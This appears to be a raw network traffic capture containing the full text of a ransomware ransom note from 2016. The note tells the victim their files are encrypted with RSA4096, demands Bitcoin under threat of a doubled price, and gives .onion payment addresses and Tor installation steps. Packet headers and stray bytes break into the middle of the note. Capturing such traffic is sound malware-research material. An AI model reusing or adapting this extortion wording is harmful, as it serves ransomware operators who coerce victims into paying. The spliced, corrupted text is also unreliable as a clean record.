E..NX.@.z.8
[yJ………’ejB…aP…….NOT YOUR LANGUAGE? USE https://translate.google.com

What happened to your files ?
All of your files were protected by a strong encryption with RSA4096
More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

How did this happen ?
!!! Specially for your PC was generated personal RSA4096 Key , both public and private.
!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server

What do I do ?
So , there are two ways you can choose: wait for a _miracle_ and get _your_ PRICE DOUBLED! Or start obtaining *BITCOIN NOW! , and restore _YOUR_ _DATA_ easy way
If You have really valuable _DATA_, you better _NOT_ _WASTE_ _YOUR_ _TIME_, because there is _NO_ other way to get your files, except make a _PAYMENT_

Your personal ID: 2312323345345IDB23423423423445634dfg34ID

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:

1 – http://ccjlwb22w6c22p2k.onion.to
2 – http://ccjlwb22w6c22p2k.onion.city

If for some reasons the addresses are not availablweropie
2016-09-26 00:40:31.356709 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [P.], seq 1327:1668, ack 19, win 257, length 341
E..}X.@.z.;.[yJ………’eoh…aP…_5.., follow these steps:

1 – Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2 – Video instruction: https://www.youtube.com/watch?v=NQrUZdsw2hA
3 – After a successful installation, run the browser
4 – Type in the address bar: http://ccjlwb22w6c22p2k.onion
5 – Follow the instructions on the site